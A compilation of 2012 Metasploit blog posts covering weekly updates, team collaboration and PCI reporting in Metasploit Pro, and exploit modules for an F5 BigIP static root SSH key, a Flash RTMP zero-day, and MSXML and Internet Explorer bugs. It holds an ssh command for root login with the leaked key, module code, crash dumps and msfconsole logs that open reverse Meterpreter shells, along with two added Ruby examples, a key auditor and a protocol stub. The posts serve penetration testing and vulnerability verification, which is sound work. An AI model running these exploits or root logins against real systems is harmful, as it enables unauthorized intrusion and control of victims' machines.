
We've been cooking along here in Stately Metasploit Manor, mostly heads-down prepping for BlackHat/Defcon season. (Yes, it's that time of year already). In the meantime, we've a grab bag of mostly post modules, a drive-by update to Meterpreter, and Juan's and sinn3r's most excellent new Flash module.

 

Meterpreter for Visual Studio 2010

 

Meterpreter is the default payload that many of our Windows exploits drop on the target, and provides things like a unified shell, file access, and so on. If you hack on Meterpreter, you may have noticed with some annoyance that some parts required VC10 (the compiler that ships with Visual Studio 2010), while others were only compatible with Visual Studio 2008. This last week, HD Moore took a pass through the Meterpreter source code and upgraded everything required to get Meterpreter compiling on Visual Studio 2010. Thanks HD!

 

Collaboration on modules

 

Also this week, contributors Ben Campbell, Loic Jaquement and David Maloney all independently submitted modules for stealing credentials out of the Windows Group Policy Preferences (GPP) XML datastores. This was an unusual circumstance -- most of the time, modules come in with one author, get a little work from sinn3r or me or somebody, and then either get rejected or land in the main Metasploit branch.

 

In this case, Loic was first with a Meterpreter script that later became a post module. David later submitted a similar module, and finally, Ben came on board with a third. Eventually, we managed to get everyone together on the one module, but I think that if you look at the pull request comment threads, it was a pretty painful process.

 

Looking over the sordid history of this module, it now looks like someone should have just set up a new public GitHub project for it. That someone was almost certainly me, so sorry for not jumping on this much sooner. If a side repo had been set up and everyone had commit rights to it, that almost certainly would have produced better code, faster. That will definitely be the strategy next time.

 

Better communication along the way could have helped as well. GitHub issues aren't the greatest way to have a long conversation (outside of code critique). For this, a mailing list would have been more appropriate -- and as it happens, I have this lovely metasploit-hackers mailing list right over there on SourceForge. It's set up specifically for Metasploit development chatter, commit commenting, and other security dev nerd talk. It's not intended for regular user Q&A -- for that, stick to the Security Street community here. But, for an archived forum for dev talk, module writers might want to subscribe to metasploit-hackers to keep abreast of what's new and current in Metasploit dev-land.

 

Flash, RTMP, and You

 

Finally, this week features Juan Vazquez and Wei "sinn3r" Chen's Flash module, complete with a barebones RTMP server. I won't rehash the ripping yarn of that development process here, but will leave it to Juan's blog post from earlier this week.

 

New Modules

 

Finally, here's the list of this week's new modules in our Exploit Database. Thanks to all of our open source contributors for their work on these, especially Loic and Ben for sticking it out for the GPP module.

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Penetration testers are not born, they're made, and we all had to start somewhere. So how do you bring new team members up to speed, mentoring them into a new role? Metasploit users in red teams and consulting organizations often tell me that they like to leverage the Metasploit Pro team collaboration feature for this purpose.

 

Metasploit Pro is accessed through a web interface that is available not only on the local host but also across the network (personal firewall rules permitting). As a result, multiple people can log into the interface at the same time, work on the same project, share sessions, credentials, evidence, and reporting.

 

For example, you can leverage team collaboration for the following cases:

 

  • Mentoring junior team members on a project, where junior team members carry out the easy tasks while senior members carry out advanced tasks
  • Splitting the workload on a large penetration test between team members
  • Leveraging the specialties of team members, for example dividing the workload up into exploiting Windows, Linux, social engineering and bruteforcing

 

This feature is great to use in combination with tagging, which can be used to assign hosts to team members. At the end of a penetration test, reports include all activities.

 

Team collaboration is available to all Metasploit Pro users who have more than one license. To leverage it, simply set up multiple users on your Metasploit Pro machine as follows:

 

  1. Open the menu Administration and select User Administration
  2. Click on New User. If this button is disabled, you either don't have Metasploit Pro or you only have a one-user license. If you purchased more than one user license but the button is disabled in your interface, please email support@rapid7.com and ask to have all user licenses consolidated on one product key.
  3. Set up projects and add the relevant users as authorized users
  4. Have users log in to the web interface from their own machines to collaborate on the projects

 

If you'd like to try out team collaboration, please download the free Metasploit Pro trial, which includes a three-user license for team collaboration.

egypt

Press F5 for root shell

Posted by egypt Employee Jun 25, 2012

As HD mentioned, F5 has been inadvertently shipping a static ssh key that can be used to authenticate as root on many of their BigIP devices. Shortly after the advisory, an anonymous contributor hooked us up with the private key.

 

Getting down to business, here it is in action:

 

    18:42:35 0 exploit(f5_bigip_known_privkey) > exploit

 

    [+] Successful login

    [*] Found shell.

    [*] Command shell session 3 opened ([redacted]:52979 -> [redacted]:22) at 2012-06-22 18:42:43 -0600

 

    id; uname -a

    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

    Linux [redacted] 2.4.21-10.0.1402.0smp #2 SMP Mon Feb 15 10:23:56 PST 2010 i686 athlon i386 GNU/Linux

    ^Z

    Background session 3? [y/N]  y

 

    18:42:35 1 exploit(f5_bigip_known_privkey) >

 

Of course, since it's just a regular ssh key, you can drop it in a file and use a standard ssh client. (Make the file readable only by you, e.g. chmod 600, or ssh will refuse to use it.)

 

    ssh -i ~/.ssh/f5-bigip.priv root@8.8.8.8

 

The advantage of using Metasploit to exploit this weakness is in the session management and rapid post-exploitation capabilities that the framework offers.
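The defensive counterpart of this bug is checking whether any host you own still trusts a key it should not. The script below is an added example, not code from the post or from Metasploit: it parses an OpenSSH authorized_keys file (options field included), fingerprints each key the way OpenSSH does (SHA256 over the raw key blob), and reports any key on a blocklist of known-bad fingerprints, plus any entry whose blob does not match its declared type. The key blobs, the blocklist and the sample file are all constructed here; they are not the F5 key.

```ruby
require 'base64'
require 'digest'

# Added example, not the post's or Metasploit's code: audit an OpenSSH
# authorized_keys file for keys whose fingerprint is on a blocklist (e.g. a
# vendor-shipped static key). The key blobs below are constructed, not real keys.
KEY_TYPES = %w[ssh-rsa ssh-dss ssh-ed25519 ecdsa-sha2-nistp256
               ecdsa-sha2-nistp384 ecdsa-sha2-nistp521].freeze

# SSH wire-format "string": 4-byte big-endian length followed by the bytes.
def ssh_string(bytes)
  [bytes.bytesize].pack('N') + bytes.b
end

# A syntactically valid ssh-ed25519 public key blob built from 32 raw bytes.
def ed25519_blob(pubkey32)
  Base64.strict_encode64(ssh_string('ssh-ed25519') + ssh_string(pubkey32))
end

# OpenSSH-style fingerprint: SHA256 over the raw blob, base64 without padding.
def fingerprint(blob_b64)
  'SHA256:' + Base64.strict_encode64(Digest::SHA256.digest(Base64.decode64(blob_b64))).delete('=')
end

# The blob starts with its own type string; it must agree with the declared type.
def blob_type_matches?(type, blob_b64)
  raw = Base64.decode64(blob_b64)
  return false if raw.bytesize < 4
  raw.byteslice(4, raw.byteslice(0, 4).unpack1('N')) == type
end

# Split a line on whitespace but keep quoted option values (from="a b") intact.
def tokenize(line)
  line.scan(/(?:[^\s"]+|"[^"]*")+/)
end

# Returns { options:, type:, blob:, comment: } or nil for blanks and comments.
def parse_authorized_key(line)
  s = line.strip
  return nil if s.empty? || s.start_with?('#')
  tokens = tokenize(s)
  idx = tokens.index { |t| KEY_TYPES.include?(t) }
  return nil if idx.nil? || tokens[idx + 1].nil?
  { options: tokens[0...idx].join(' '), type: tokens[idx],
    blob: tokens[idx + 1], comment: Array(tokens[(idx + 2)..]).join(' ') }
end

# One finding per offending line: { line:, fingerprint:, reason: }.
def audit_authorized_keys(text, blocklist)
  findings = []
  text.each_line.with_index(1) do |line, n|
    key = parse_authorized_key(line)
    next if key.nil?
    unless blob_type_matches?(key[:type], key[:blob])
      findings << { line: n, fingerprint: nil, reason: :malformed }
      next
    end
    fp = fingerprint(key[:blob])
    findings << { line: n, fingerprint: fp, reason: :known_bad } if blocklist.include?(fp)
  end
  findings
end

# Constructed data: one harmless key and one "known bad" key (both fake ed25519 blobs).
GOOD_BLOB = ed25519_blob((33..64).map(&:chr).join)
BAD_BLOB  = ed25519_blob((1..32).map(&:chr).join)
KNOWN_BAD_FINGERPRINTS = [fingerprint(BAD_BLOB)].freeze

SAMPLE_AUTHORIZED_KEYS = <<~KEYS
  # constructed sample of /root/.ssh/authorized_keys
  ssh-ed25519 #{GOOD_BLOB} ops@jump
  from="10.0.0.0/8",no-pty ssh-ed25519 #{BAD_BLOB} vendor-support
  ssh-ed25519 not-base64-at-all broken
KEYS

if __FILE__ == $PROGRAM_NAME
  audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_BAD_FINGERPRINTS).each do |f|
    puts "line #{f[:line]}: #{f[:reason]} #{f[:fingerprint]}"
  end
end
```

To use it for real, replace the constructed blocklist with the fingerprint of the key you are hunting (ssh-keygen -lf on the public half prints the same SHA256 form) and feed it the authorized_keys files collected from your hosts; a `from=` restriction on a known-bad key narrows the exposure but does not make the key acceptable, so the check deliberately ignores options.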

This bug is also interesting in that it gave us a good test case for using static SSH credentials as an exploit module rather than auxiliary. The key difference between exploit and auxiliary modules is usually the need for a payload. If it needs a payload: exploit. Otherwise, it's auxiliary. In this case it's a little blurry, though, because it results in a session, which is typically an exploit trait. Some of our authentication bruteforce scanners get around this with some ruby acrobatics so they can still create a session despite not having a payload or a handler.

 

From a module developer perspective, this exploit has a few interesting aspects that you won't see elsewhere.

First, and probably most important, it doesn't upload a payload to the victim. The connection itself becomes a shell, so it doesn't need to but that presents a bit of a problem with the framework's design. Fortunately there is a payload for exactly this situation: cmd/unix/interact. This simple payload is different from most; all it does is shunt commands from the user straight to the socket and back. It uses a "find" handler similar to the way a findsock payload works. To tell the framework about the payload and handler this exploit will require, we need a block in the module info like so:

 

    'Payload'     => {
      'Compat'  => {
        'PayloadType'    => 'cmd_interact',
        'ConnectionType' => 'find',
      },
    },

 

Since there is really only one payload that works with this exploit, it also makes sense to set it by default:

 

    'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

 

Next, it uses our modified Net::SSH library to connect to the victim. Most exploits will include Msf::Exploit::Remote::Tcp or one of its descendants; those related mixins all set up the options everyone is familiar with: RHOST, RPORT, etc. Since this one does not, we have to do it manually like so:

 

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22),
      ], self.class)

 

Lastly, because the handler is of type "find" we must call handler() to get a session. Most Remote::Tcp exploits don't have to do this if they are not compatible with "find" because the handler will spawn a session whenever a connection is made (either reverse or bind). However, all exploits that *are* compatible with "find" payloads must call handler() at some point. Normally there is a global socket created by the Tcp mixin when you call connect() but in this case it is necessary to let the handler know our socket is now a shell.

 

    def exploit
      conn = do_login("root")
      if conn
        print_good "Successful login"
        handler(conn.lsock)
      end
    end

 

This was a fun module to write. The devices it targets can be a goldmine for a pentester who likes packets since they're basically a giant packet sink that lets you read and modify traffic willy nilly. ARP spoofing is noisy and DNS poisoning is hard, let's just own the firewall.

Ever since the first sightings of a new zero-day attack (CVE-2012-0779) on Adobe Flash last month, the exact path of exploitation has been somewhat of a mystery. The attacks were specifically targeted against defense contractors and other victims as part of a spear phishing campaign, and included a Word document with an embedded Flash (SWF) object. The infected machines were observed contacting malicious servers in China, Korea, and the United States. While the vulnerability has since been patched by Adobe, we were interested in how the exploit worked so we could add an exploit module to Metasploit, which enables organizations to verify whether they are vulnerable to the attack.

 

Though the malware's behavior is well-documented, there was little information on the trigger, which is the method to create an application crash associated with the vulnerability. By the time most researchers read about the attack, the crucial clue revealing the trigger -- the Real Time Messaging Protocol (RTMP) server -- was already offline.

 

Here is our story of how we researched this exploit:

 

Initially, we found a sample of the malware and started analyzing the SWF (Shockwave Flash) file. We found the SWF's heap spray, a software exploitation technique that fills the application's memory with attacker-controlled allocations so that a specific region of memory holds predictable content, which is then used to gain code execution when a crash occurs. The SWF also had a payload, which takes control of the computer once compromised, and an RTMP communication attempt... but we found no trigger. After some more digging, we concluded the vulnerability is most likely due to the handling of AMF (Action Message Format) messages over RTMP (comments quoted from Adobe ActionScript 3.0 Reference for the Adobe Flash Platform):

 

public function v42(_arg1:String):void{
  // The NetConnection class creates a two-way connection
  // between a client and a server. The client can be a Flash
  // Player or AIR application. The server can be a web server,
  // Flash Media Server, an application server running Flash Remoting, or the Adobe Stratus service
  this.v15 = new NetConnection();

  var _local2 = "rtmp://";
  var _local3 = "/TSGeneralSetting";
  var _local4:String = ((_local2 + _arg1) + _local3);

  // Creates a two-way connection to an application on Flash Media Server or to Flash Remoting, or creates a two-way
  // network endpoint for RTMFP peer-to-peer group communication
  this.v15.connect(_local4);

  // Calls a command or method on Flash Media Server or on an application server running Flash Remoting
  this.v15.call("systemMemoryCall", this.v16, "argc");
}

Not having access to a malicious RTMP server, we set up our own Flash Media Server and inspected the intended communication (screenshot: rtmp_connection.png).

Our first guess was that the trigger was related to the parsing of the systemMemoryCall() response. But our RTMP server didn't recognize this function call, and returned an AMF error message. Since we didn't have the original trigger RTMP server, the trail went cold, and eventually we decided to move on to other things.


This is also the point where other researchers stopped their analysis and gave up.


Thankfully, we got our hands on a PCAP that captured the RTMP communication between an infected machine and the actual RTMP server. The first thing we did was compare the legitimate "systemMemoryCall" response from a Flash Media Server with the malicious one:


(screenshot: error_messages.png, the legitimate and malicious _error responses side by side)


The "_error" response from the malicious RTMP server is definitely malformed. According to the RTMP specification from Adobe, an _error response should look like this:


Field Name      Type     Description
Command Name    String   "_error" indicates an error
Transaction ID  Number   Transaction ID
Information     Object   Name-value pairs that describe the response from the server; 'code', 'level' and 'description' are the names of a few.


After playing with the RTMP "_error" response, we were finally able to trigger an exploitable crash from Adobe Flash:



(348.540): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000

eip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0         nv up ei pl nz na po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202

Flash32_11_2_202_228!DllUnregisterServer+0x300e84:

104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]

ds:0023:44444470=????????

 

0:000> u eip

Flash32_11_2_202_228!DllUnregisterServer+0x300e84:

104b1b2d 8b422c          mov     eax,dword ptr [edx+2Ch]

104b1b30 53              push    ebx

104b1b31 ffd0            call    eax


Because the type confusion is triggered when handling a malformed RTMP _error message, you don't need to wait for the systemMemoryCall() request. Instead, a malicious RTMP server can just return a crafted "_error" in reply to the client's initial "connect" command (the first command a client sends, per the RTMP specification). This made it much easier to build the Metasploit module.


While Metasploit supports a variety of mixins for many different protocols, none existed for RTMP, so we built one using the "Rex::Socket::TcpServer" API -- just enough to talk RTMP with the client, delivering the protocol handshake and serving the malicious _error response messages for "connect" requests.
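What "just enough RTMP" amounts to is shown below as an added example; it is not the post's code and not the adobe_flash_rtmp module. It implements the plain (non-HMAC) RTMP handshake from the spec, an AMF0 encoder/decoder for the types a command message uses, RTMP chunking with the default 128-byte chunk size, and a server-side reply to the client's "connect" that is a well-formed "_error" laid out as in the table above (command name, transaction id, information object). It constructs a well-formed response only, not the malformed trigger. The client request is built inline to resemble what the SWF's NetConnection.connect("rtmp://host/TSGeneralSetting") sends; the host, the flashVer string and the chunk stream id 3 are assumptions.

```ruby
# Added example, not code from the post or from Metasploit's adobe_flash_rtmp module.
RTMP_VERSION     = 3
HANDSHAKE_SIZE   = 1536   # C1/S1/C2/S2: 4 bytes time, 4 bytes zero/time2, 1528 random
CHUNK_SIZE       = 128    # default maximum chunk payload size
MSG_AMF0_COMMAND = 0x14   # message type id of an AMF0 command message

# S0+S1+S2 for a received C0+C1. S2 echoes C1's time and its 1528 random bytes.
def handshake_reply(c0c1, server_time: 0, rng: Random.new(0))
  raise 'unsupported RTMP version' unless c0c1.getbyte(0) == RTMP_VERSION
  c1 = c0c1.byteslice(1, HANDSHAKE_SIZE)
  s1 = [server_time].pack('N') + "\x00\x00\x00\x00".b + rng.bytes(HANDSHAKE_SIZE - 8)
  s2 = c1.byteslice(0, 4) + [server_time].pack('N') + c1.byteslice(8, HANDSHAKE_SIZE - 8)
  [RTMP_VERSION].pack('C') + s1 + s2
end

# AMF0 encoding: a one-byte type marker followed by the value.
def amf0_encode(v)
  case v
  when Numeric then "\x00".b + [v.to_f].pack('G')            # big-endian IEEE754 double
  when String  then "\x02".b + [v.bytesize].pack('n') + v.b   # u16 length + bytes
  when nil     then "\x05".b
  when Hash                                                   # name/value pairs, then 0x000009
    pairs = v.map { |k, x| [k.to_s.bytesize].pack('n') + k.to_s.b + amf0_encode(x) }
    "\x03".b + pairs.join + "\x00\x00\x09".b
  else raise ArgumentError, "unsupported AMF0 type #{v.class}"
  end
end

# AMF0 decoding of one value at offset pos; returns [value, next_offset].
def amf0_decode(buf, pos)
  case buf.getbyte(pos)
  when 0x00 then [buf.byteslice(pos + 1, 8).unpack1('G'), pos + 9]
  when 0x02
    len = buf.byteslice(pos + 1, 2).unpack1('n')
    [buf.byteslice(pos + 3, len).force_encoding('UTF-8'), pos + 3 + len]
  when 0x03
    obj, pos = {}, pos + 1
    loop do                                                  # until the 0x00 0x00 0x09 end marker
      nlen = buf.byteslice(pos, 2).unpack1('n')
      return [obj, pos + 3] if nlen.zero? && buf.getbyte(pos + 2) == 0x09
      name = buf.byteslice(pos + 2, nlen).force_encoding('UTF-8')
      obj[name], pos = amf0_decode(buf, pos + 2 + nlen)
    end
  when 0x05 then [nil, pos + 1]
  else raise "unsupported AMF0 marker #{buf.getbyte(pos)}"
  end
end

# Wrap a message in chunks: an 11-byte type-0 header on the first chunk and a
# 1-byte type-3 header on every continuation, CHUNK_SIZE payload bytes per chunk.
def rtmp_chunk_message(payload, type_id, csid: 3, stream_id: 0)
  head = [csid].pack('C') +                               # fmt=0, chunk stream id 2..63
         [0].pack('N').byteslice(1, 3) +                  # timestamp (3 bytes)
         [payload.bytesize].pack('N').byteslice(1, 3) +   # message length (3 bytes)
         [type_id].pack('C') + [stream_id].pack('V')      # type id, stream id (little-endian)
  pieces = payload.bytes.each_slice(CHUNK_SIZE).map { |s| s.pack('C*') }
  head + pieces.first + pieces.drop(1).map { |p| [0xC0 | csid].pack('C') + p }.join
end

# Reassemble one message from a chunk stream; returns [type_id, payload].
def rtmp_dechunk(data)
  fmt, csid = data.getbyte(0) >> 6, data.getbyte(0) & 0x3F
  raise 'expected a type-0 chunk header' unless fmt.zero?
  length  = ("\x00".b + data.byteslice(4, 3)).unpack1('N')
  type_id = data.getbyte(7)
  payload, pos = ''.b, 12
  until payload.bytesize == length
    unless payload.empty?                                 # continuation: 1-byte type-3 header
      raise 'bad continuation header' unless data.getbyte(pos) == (0xC0 | csid)
      pos += 1
    end
    take = [CHUNK_SIZE, length - payload.bytesize].min
    payload << data.byteslice(pos, take)
    pos += take
  end
  [type_id, payload]
end

# Answer the client's "connect" with a well-formed _error: command name, transaction
# id, information object. NetConnection.Connect.Rejected is a standard status code.
def reply_to_connect(request_chunks)
  type_id, payload = rtmp_dechunk(request_chunks)
  raise 'not an AMF0 command' unless type_id == MSG_AMF0_COMMAND
  name, pos = amf0_decode(payload, 0)
  txn, _    = amf0_decode(payload, pos)
  raise "unexpected command #{name}" unless name == 'connect'
  info = { 'level' => 'error', 'code' => 'NetConnection.Connect.Rejected',
           'description' => 'example server: connection refused' }
  rtmp_chunk_message(amf0_encode('_error') + amf0_encode(txn) + amf0_encode(info), MSG_AMF0_COMMAND)
end

# Constructed request, shaped like what NetConnection.connect("rtmp://host/TSGeneralSetting") sends.
CONNECT_REQUEST = rtmp_chunk_message(
  amf0_encode('connect') + amf0_encode(1) +
  amf0_encode('app' => 'TSGeneralSetting', 'flashVer' => 'WIN 11,2,202,228',
              'tcUrl' => 'rtmp://10.0.0.5/TSGeneralSetting', 'objectEncoding' => 0),
  MSG_AMF0_COMMAND
)

if __FILE__ == $PROGRAM_NAME
  c0c1 = [RTMP_VERSION].pack('C') + [1234].pack('N') + "\x00\x00\x00\x00".b + Random.new(7).bytes(1528)
  puts "S0+S1+S2: #{handshake_reply(c0c1).bytesize} bytes"
  _, body = rtmp_dechunk(reply_to_connect(CONNECT_REQUEST))
  name, pos = amf0_decode(body, 0)
  txn, pos  = amf0_decode(body, pos)
  puts "#{name} txn=#{txn} #{amf0_decode(body, pos).first.inspect}"
end
```

Wiring this to a TCPServer is the only step left to serve a real client: read 1537 bytes, write handshake_reply, read C2 (1536 bytes), then dechunk the first command and write reply_to_connect's bytes. The connect request above is 143 bytes of AMF0, so it already exercises the two-chunk path, which is the part that is easiest to get wrong when hand-rolling a protocol stub.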


After completing our exploit voodoo ritual, we present to you this new Metasploit module for CVE-2012-0779, which works on Internet Explorer 6, 7 and 8 (with DEP bypass) on Windows XP SP3:



msf > use exploit/windows/browser/adobe_flash_rtmp

msf  exploit(adobe_flash_rtmp) > exploit

[*] Exploit running as background job.

 

[*] Started reverse handler on 192.168.1.157:4444

[*] Using URL: http://0.0.0.0:8080/Sgs7eu3zjBo0

[*]  Local IP: http://192.168.1.157:8080/Sgs7eu3zjBo0

[*] Server started.

msf  exploit(adobe_flash_rtmp) > [*] 192.168.1.158    adobe_flash_rtmp - Client requesting: /Sgs7eu3zjBo0

[*] 192.168.1.158    adobe_flash_rtmp - Using msvcrt ROP

[*] 192.168.1.158    adobe_flash_rtmp - Sending html

[*] 192.168.1.158    adobe_flash_rtmp - Client requesting: /Sgs7eu3zjBo0/BnKXAzRw.swf

[*] 192.168.1.158    adobe_flash_rtmp - Sending Exploit SWF

[*] 192.168.1.158    adobe_flash_rtmp - Connected to RTMP

[*] Sending stage (752128 bytes) to 192.168.1.158

[*] Meterpreter session 1 opened (192.168.1.157:4444 -> 192.168.1.158:1840) at 2012-06-22 11:11:16 +0200

[*] Session ID 1 (192.168.1.157:4444 -> 192.168.1.158:1840) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: iexplore.exe (2284)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 3904

[+] Successfully migrated to process

 

If you would like to try out this new module, get your free Metasploit download now or update your existing installation.

 

sinn3r & juan

This week's release sees a quiet vulnerability fix, an exploit against an unpatched vulnerability in Microsoft's XML Core Services, and some helpful new/old commands, as well as the usual pile of exploity goodness you've come to expect from the Metasploit kitchen.

 

Vulnerabilities? In My Metasploit?

 

It's more likely than you think. Like all reasonably complex software packages, Metasploit occasionally ships with security vulnerabilities. Lucky for us, our user base tends to be pretty sophisticated when it comes to discovering and reporting vulns in our product, so these bugs are usually pretty short-lived. This week, Borja Merino discovered one, reported it over the weekend, and we rolled an emergency fix out that day.


If you have a security vulnerability in Metasploit, I would be super-grateful if you reported it to security@metasploit.com so that we can roll out a fix. Here at Metasploit we stick to a 60-day disclosure policy for vulnerabilities that we discover independently, so we'd appreciate the heads-up the next time a Metasploit vuln surfaces. In return, we'll be sure you get credited with discovery and all that.

 

Speaking of Zero-Day...

 

This release contains a module for an unpatched vulnerability in Microsoft's XML Core Services. The module exercises the vuln via Internet Explorer, and the vulnerability is still unpatched at the time of writing. For more details on that, see Wei "sinn3r" Chen's blog post from earlier this week. For tips on how to avoid getting exploited out on the wild Internet, keep an eye on Microsoft Security Advisory 2719615. In the meantime, the Metasploit module appears to be the best way to test your exposure, given whatever mitigation you settle on while waiting for a patch.

 

Deprecated Commands

 

This week, Metasploit core developer James "egyp7" Lee tackled a persistent problem we've been having on the IRC channel -- people who have read Metasploit: The Penetration Tester's Guide and who subsequently notice that commands like db_hosts are no longer functional. Egypt has instituted a deprecated commands system for msfconsole now, so users who try db_hosts, db_services, etc. get a helpful redirect to the correct "hosts" or "services" command. In addition, since it's been about eight months since db_autopwn was deprecated and people still ask about it, we suspect that's floating around in documentation as well -- so that command gives a helpful link to HD Moore's blog post, Six Ways to Automate Metasploit.

 

New Modules

 

Finally, here's the list of this week's new modules. Thanks to all of our open source contributors for their work on these.

 

 


PCI DSS Requirement 11.3 requires that you "perform penetration testing at least once a year, and after any significant infrastructure or application upgrade or modification". You can either conduct this PCI penetration test in-house or hire a third-party assessor. Metasploit Pro offers a PCI reporting template, which helps you in both of those cases. If you are conducting the penetration test in-house, it helps you document compliance to your QSA. If you are hiring a third-party penetration tester, Metasploit Pro can help you assess the security of your environment in advance so you pass your audit.

 

Metasploit Pro tests for and reports on these PCI requirements:

 

  • PCI Requirement 2.2.1: Implement only one primary function per server to prevent functions that require different security levels from co-existing on the same server. (For example, web servers, database servers, and DNS should be implemented on separate servers.)
  • PCI Requirement 2.3: Encrypt all non-console administrative access such as browser/Web-based management tools.
  • PCI Requirement 6.1: Ensure that all system components and software have the latest vendor-supplied security patches installed. Deploy critical patches within a month of release.
  • PCI Requirement 8.2: Employ at least one of these to authenticate all users: password or passphrase; or two-factor authentication (e.g., token devices, smart cards, biometrics, public keys).
  • PCI Requirement 8.4: Render all passwords unreadable for all system components both in storage and during transmission using strong cryptography based on approved standards.
  • PCI Requirement 8.5: Ensure proper user authentication and password management for non-consumer users and administrators on all system components.
  • PCI Requirement 8.5.8: Do not use group, shared, or generic accounts and passwords, or other authentication methods.
  • PCI Requirement 8.5.10: Require a minimum password length of at least seven characters.
  • PCI Requirement 8.5.11: Use passwords containing both numeric and alphabetic characters.

 

Attached, you'll find a sample Metasploit PCI DSS report. To test the software in your environment, download Metasploit now.

We've been noticing a lot of exploit activity against Microsoft vulnerabilities lately. We decided to look into some of these attacks, and released two modules for CVE-2012-1889 and CVE-2012-1875 within a week of the vulnerabilities' publication for our users to test their systems. Please note that both are very important to any organization running Windows, because one of them is a newly patched bug, while the other is still a zero-day. To test if any systems on your network are vulnerable, you can download the latest version of Metasploit for free.

 

CVE-2012-1889: MSXML Uninitialized Memory Corruption

 

This is an uninitialized memory bug found in MSXML. According to Microsoft, the component can be loaded from either Internet Explorer or Microsoft Office. This vulnerability is rumored to be "state-sponsored", and what makes it really critical is that it's still a 0-day and is being used to hijack Gmail accounts. That's right: if you're using Gmail as well as Internet Explorer or Microsoft Office, you're at risk. We expect this vulnerability to grow even more dangerous since there's no patch and it's rather easy to trigger. There is a temporary mitigation from Microsoft (disabling the component and other config tweaks), but obviously that has its limitations. Your best bet may be to use a different browser such as Google Chrome until an official patch is available.

 

Jun 19th, 2012 Update: This module now works for IE6/7/8/9, Windows XP, Vista, and all the way to Windows 7 SP1.

July 10th, 2012 Update: Patch is now available.

 

Here's how you can check with Metasploit if any systems on your network are vulnerable, which is very likely since there is no patch available yet:

 

msf > use exploit/windows/browser/msxml_get_definition_code_exec

msf  exploit(msxml_get_definition_code_exec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf  exploit(msxml_get_definition_code_exec) > set lhost 10.0.1.3

lhost => 10.0.1.3

msf  exploit(msxml_get_definition_code_exec) > exploit

[*] Exploit running as background job.

 

[*] Started reverse handler on 10.0.1.3:4444

[*] Using URL: http://0.0.0.0:8080/xtQdbEC7QDIb

msf  exploit(msxml_get_definition_code_exec) >

[*]  Local IP: http://10.0.1.3:8080/xtQdbEC7QDIb

[*] Server started.

[*] 10.0.1.79        msxml_get_definition_code_exec - Using msvcrt ROP

[*] 10.0.1.79        msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html

[*] Sending stage (752128 bytes) to 10.0.1.79

[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.79:1565) at 2012-06-18 14:07:38 -0500

[*] Session ID 2 (10.0.1.3:4444 -> 10.0.1.79:1565) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: iexplore.exe (2856)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 2356

[+] Successfully migrated to process

 

CVE-2012-1875: Internet Explorer Same ID Use-After-Free

 

This is a vulnerability in the way Internet Explorer handles the Same ID property: it accesses an already-deleted object, which results in remote code execution. This has been exploited in the wild, possibly originating from Hong Kong. According to AlienVault Labs, the command-and-control (C&C) server is still active at the time of this writing. The Metasploit module shares some similarities with the one found in the wild -- both bypass DEP/ASLR using msvcr71.dll, and both target common systems such as Windows XP and Windows 7. Multiple anti-virus vendors already have a signature for this exploit. However, AV cannot patch the bug, so we still recommend trying the Metasploit module to verify whether you are indeed still vulnerable.

 

To use this module, simply do the following:

 

msf > use exploit/windows/browser/ms12_037_same_id

msf  exploit(ms12_037_same_id) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf  exploit(ms12_037_same_id) > set lhost 10.0.1.3

lhost => 10.0.1.3

msf  exploit(ms12_037_same_id) > exploit

[*] Exploit running as background job.

 

[*] Started reverse handler on 10.0.1.3:4444

[*] Using URL: http://0.0.0.0:8080/gTHJEKBboMi

 

[*]  Local IP: http://10.0.1.3:8080/gTHJEKBboMi

[*] Server started.

msf  exploit(ms12_037_same_id) >

[*] 10.0.1.79        ms12_037_same_id - Client requesting: /gTHJEKBboMi

[*] 10.0.1.79        ms12_037_same_id - Using msvcrt ROP

[*] 10.0.1.79        ms12_037_same_id - Sending html

[*] Sending stage (752128 bytes) to 10.0.1.79

[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.79:1685) at 2012-06-18 13:42:49 -0500

[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.79:1685) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: iexplore.exe (3916)

[*] Spawning notepad.exe process to migrate to

[+] Migrating to 1680

[+] Successfully migrated to process

 

If you have any questions, let us know in the comments section.  To obtain the latest version of Metasploit for free, please go to: http://www.metasploit.com/download/

This video shows Metasploit Community Edition being used to run an nmap scan on a Virtual Box network in order to discover hosts.

 

This video covers the basics of launching exploits from Metasploit Community Edition. The exploits were discovered in a previous step both with Nexpose and Nessus. In the case of Nessus the results were exported as a .Nessus file then imported into Metasploit Community Edition. This video picks up right after the vulnerabilities are discovered and imported.

 

nmap reporting is excellent with the XML option, but this is not used in a lot of cases. The XML output from nmap can be imported into other tools such as Metasploit Community Edition (Import button), the Metasploit database, and others. Also, the XML format can be opened in a web browser to produce a well-formatted report suitable for attaching to a pen-test report.

 

